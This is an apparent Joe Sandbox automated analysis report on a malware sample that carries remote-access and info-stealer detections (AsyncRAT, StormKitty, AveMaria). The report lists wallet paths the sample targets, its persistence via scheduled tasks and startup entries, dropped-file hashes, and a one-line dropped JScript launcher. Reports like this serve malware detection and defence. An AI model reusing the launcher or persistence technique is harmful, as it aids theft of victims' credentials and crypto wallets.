Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00AA0AB8 cpuid

18_2_00AA0AB8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Users\user\AppData\Roaming\winservices.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Users\user\AppData\Roaming\winservices.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Users\user\AppData\Roaming\winservices.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\winservices.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00ADE3BB GetLocalTime,

18_2_00ADE3BB

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00ADE419 GetUserNameW,

18_2_00ADE419

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Code function: 18_2_00ABBD72 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

18_2_00ABBD72

Source: C:\Users\user\Desktop\nj230708full.pdf.scr.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Yara detected BrowserPasswordDump

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: exodusporn
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Source: EchoCraft.scr	Binary or memory string: WIN_81
Source: EchoCraft.scr	Binary or memory string: WIN_XP
Source: EchoCraft.scr.10.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: EchoCraft.scr	Binary or memory string: WIN_XPe
Source: EchoCraft.scr	Binary or memory string: WIN_VISTA
Source: EchoCraft.scr	Binary or memory string: WIN_7
Source: EchoCraft.scr	Binary or memory string: WIN_8

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Yara detected BrowserPasswordDump

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.MSBuild.exe.de9f06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 24.2.MSBuild.exe.d00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5812, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00B0204C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		18_2_00B0204C
Source: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	Code function: 18_2_00B01A4A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		18_2_00B01A4A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	32 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	31 Scheduled Task/Job	31 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	212 Process Injection	211 Masquerading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	31 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	141 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nj230708full.pdf.scr.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\186040\Tracks.pif	5%	ReversingLabs
C:\Users\user\AppData\Roaming\winservices.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
ldGbGMtXrGEEgvmsQPPgfGUzt.ldGbGMtXrGEEgvmsQPPgfGUzt	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://stackoverflow.com/q/14436606/23354cIt	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
http://ipinfo.io/ip	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
https://github.com/LimerBoy/StormKitty	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
https://discordapp.com/api/v6/users/	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/X	nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000000.1735557407.0000000000225000.00000002.00000001.01000000.00000006.sdmp, EchoCraft.scr, 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmp, EchoCraft.scr, 00000015.00000002.1909972236.0000000000B55000.00000002.00000001.01000000.00000008.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	false	high
https://urn.to/r/sds_see	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	nj230708full.pdf.scr.exe	false	high
https://www.autoitscript.com/autoit3/	nj230708full.pdf.scr.exe, 00000000.00000003.1694831618.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tracks.pif, 0000000A.00000003.1748119592.0000000003F93000.00000004.00000800.00020000.00000000.sdmp, Tracks.pif.1.dr, Skirts.0.dr, EchoCraft.scr.10.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000018.00000002.2134406759.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2795960802.0000000002AED000.00000004.00000800.00020000.00000000.sdmp	false	high
https://urn.to/r/sds_seeaCould	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
http://james.newtonking.com/projects/json	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.newtonsoft.com/jsonschema	MSBuild.exe, 00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555331
Start date and time:	2024-11-13 18:42:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nj230708full.pdf.scr.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@70/48@1/0
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 86 Number of non-executed functions: 290
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 93.184.221.240, 192.229.221.95, 20.242.39.171, 40.69.42.241
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, wu.ec.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target winservices.exe, PID 7232 because it is empty
Execution Graph export aborted for target winservices.exe, PID 7636 because it is empty
Execution Graph export aborted for target winservices.exe, PID 7956 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: nj230708full.pdf.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
12:43:12	API Interceptor	1x Sleep call for process: Tracks.pif modified
17:43:11	Task Scheduler	Run new task: Involvement path: wscript s>//B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js"
17:43:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url
17:43:51	Task Scheduler	Run new task: winservices path: "C:\Users\user\AppData\Roaming\winservices.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.45
	https://drive.google.com/uc?export=download&id=1iaK9ppq5gLIgMAIIEMZ874KKXqw8TPYH	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	13.107.246.45
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://carrier.businessappdevs.com/Baa9N	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	13.107.246.45
fp2e7a.wpc.phicdn.net	Support.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	file.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	https://drive.google.com/uc?export=download&id=1iaK9ppq5gLIgMAIIEMZ874KKXqw8TPYH	Get hash	malicious	Unknown	Browse	192.229.221.95
	Support.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://carrier.businessappdevs.com/Baa9N	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	192.229.221.95
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Document-v17-10-27.js	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.45
	https://drive.google.com/uc?export=download&id=1iaK9ppq5gLIgMAIIEMZ874KKXqw8TPYH	Get hash	malicious	Unknown	Browse	13.107.246.45
	Document-v17-10-27.js	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	2024-2025_Open Enrollment4402462144024621.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	13.107.246.45

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr	file.exe	Get hash	malicious	LummaC	Browse
	044f.pdf.exe	Get hash	malicious	Unknown	Browse
	BNJ922u7IU.exe	Get hash	malicious	LummaC	Browse
	BNJ922u7IU.exe	Get hash	malicious	LummaC Stealer	Browse
	OtherBahamas.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	ExeFile (236).exe	Get hash	malicious	Oski	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.32879.26297.16830.exe	Get hash	malicious	Vidar	Browse
	dUJqAYctYk.exe	Get hash	malicious	Vidar	Browse
	NervousGrammar.exe	Get hash	malicious	RHADAMANTHYS	Browse

Created / dropped Files

C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\186040\Tracks.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.643190723119337
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5ga5HGZi+G1RLvHFZo5uWAX+Ro6p4EkD5ga5S:RiJBJHonwWDKaJkDTcZzUrHFywWDKaJb
MD5:	412BDC880188A8817EE73CD1F29334AB
SHA1:	DC50C1FCA5A04D147613D802A6BAE67C8C9B09EF
SHA-256:	CB5EF136A7037DD05430FA51720AF59FA9EECF6B71162F9671119230192704FB
SHA-512:	014544BE2AFE713EDE77461095E706ADC6C0C0DE1BCA36E8DAD32ACBB32981AC41FE890F6A71548D1A2C188B9E2BD64B3634EB5B47BD1E4D9992DCCE30A59EF1
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\EchoArtisan Technologies\\EchoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\EchoArtisan Technologies\\K\"")

C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\186040\Tracks.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
